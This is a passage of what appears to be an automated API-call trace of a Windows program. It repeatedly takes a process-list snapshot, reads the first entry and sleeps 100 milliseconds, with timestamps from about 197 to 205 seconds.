pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.657] Sleep (dwMilliseconds=0x64) [0197.672] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0197.687] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.761] Sleep (dwMilliseconds=0x64) [0197.848] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0197.876] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.963] Sleep (dwMilliseconds=0x64) [0197.967] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0197.978] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.068] Sleep (dwMilliseconds=0x64) [0198.077] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0198.087] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.183] Sleep (dwMilliseconds=0x64) [0198.204] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0198.214] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.292] Sleep (dwMilliseconds=0x64) [0198.313] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0198.332] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.408] Sleep (dwMilliseconds=0x64) [0198.418] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0198.428] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.500] Sleep (dwMilliseconds=0x64) [0198.512] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0198.524] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.651] Sleep (dwMilliseconds=0x64) [0198.653] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0198.665] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.752] Sleep (dwMilliseconds=0x64) [0198.766] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0198.782] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.187] Sleep (dwMilliseconds=0x64) [0199.232] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0199.245] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.367] Sleep (dwMilliseconds=0x64) [0199.376] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0199.389] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.524] Sleep (dwMilliseconds=0x64) [0199.528] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0199.540] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.611] Sleep (dwMilliseconds=0x64) [0199.622] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0199.635] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.710] Sleep (dwMilliseconds=0x64) [0199.792] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0199.862] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.922] Sleep (dwMilliseconds=0x64) [0199.935] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0199.946] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.005] Sleep (dwMilliseconds=0x64) [0200.013] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0200.023] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.122] Sleep (dwMilliseconds=0x64) [0200.138] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0200.149] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.210] Sleep (dwMilliseconds=0x64) [0200.216] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0200.226] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.289] Sleep (dwMilliseconds=0x64) [0200.294] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0200.304] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.372] Sleep (dwMilliseconds=0x64) [0200.390] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0200.410] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.483] Sleep (dwMilliseconds=0x64) [0200.498] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0200.508] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.572] Sleep (dwMilliseconds=0x64) [0200.574] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0200.586] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.647] Sleep (dwMilliseconds=0x64) [0200.655] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0200.666] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.932] Sleep (dwMilliseconds=0x64) [0200.990] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0201.004] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.078] Sleep (dwMilliseconds=0x64) [0201.092] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0201.103] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.205] Sleep (dwMilliseconds=0x64) [0201.217] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0201.230] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.328] Sleep (dwMilliseconds=0x64) [0201.341] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0201.357] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.430] Sleep (dwMilliseconds=0x64) [0201.434] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0201.448] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.521] Sleep (dwMilliseconds=0x64) [0201.529] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0201.542] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.614] Sleep (dwMilliseconds=0x64) [0201.622] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0201.634] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.706] Sleep (dwMilliseconds=0x64) [0201.722] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0201.746] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.851] Sleep (dwMilliseconds=0x64) [0201.856] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0201.868] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.940] Sleep (dwMilliseconds=0x64) [0201.953] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0201.963] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.040] Sleep (dwMilliseconds=0x64) [0202.044] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0202.055] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.143] Sleep (dwMilliseconds=0x64) [0202.153] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0202.163] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.242] Sleep (dwMilliseconds=0x64) [0202.246] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0202.259] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.351] Sleep (dwMilliseconds=0x64) [0202.356] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0202.369] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.456] Sleep (dwMilliseconds=0x64) [0202.470] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0202.488] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.590] Sleep (dwMilliseconds=0x64) [0202.609] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0202.627] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.719] Sleep (dwMilliseconds=0x64) [0202.734] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0202.751] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.869] Sleep (dwMilliseconds=0x64) [0202.874] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0202.885] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.959] Sleep (dwMilliseconds=0x64) [0202.966] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0202.975] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.054] Sleep (dwMilliseconds=0x64) [0203.060] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0203.073] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.198] Sleep (dwMilliseconds=0x64) [0203.219] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0203.236] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.333] Sleep (dwMilliseconds=0x64) [0203.341] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0203.355] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.443] Sleep (dwMilliseconds=0x64) [0203.451] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0203.461] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.521] Sleep (dwMilliseconds=0x64) [0203.528] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0203.538] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.594] Sleep (dwMilliseconds=0x64) [0203.607] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0203.617] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.778] Sleep (dwMilliseconds=0x64) [0203.807] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0203.818] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.925] Sleep (dwMilliseconds=0x64) [0203.938] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0203.953] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.038] Sleep (dwMilliseconds=0x64) [0204.044] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0204.057] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.151] Sleep (dwMilliseconds=0x64) [0204.156] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0204.175] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.284] Sleep (dwMilliseconds=0x64) [0204.294] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0204.306] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.378] Sleep (dwMilliseconds=0x64) [0204.388] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0204.400] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.474] Sleep (dwMilliseconds=0x64) [0204.484] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0204.497] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.569] Sleep (dwMilliseconds=0x64) [0204.574] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0204.586] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.655] Sleep (dwMilliseconds=0x64) [0204.669] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0204.682] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.749] Sleep (dwMilliseconds=0x64) [0204.772] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0204.789] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.994] Sleep (dwMilliseconds=0x64) [0204.999] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20bc [0205.010] Process32First (in: hSnapshot=0x20bc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 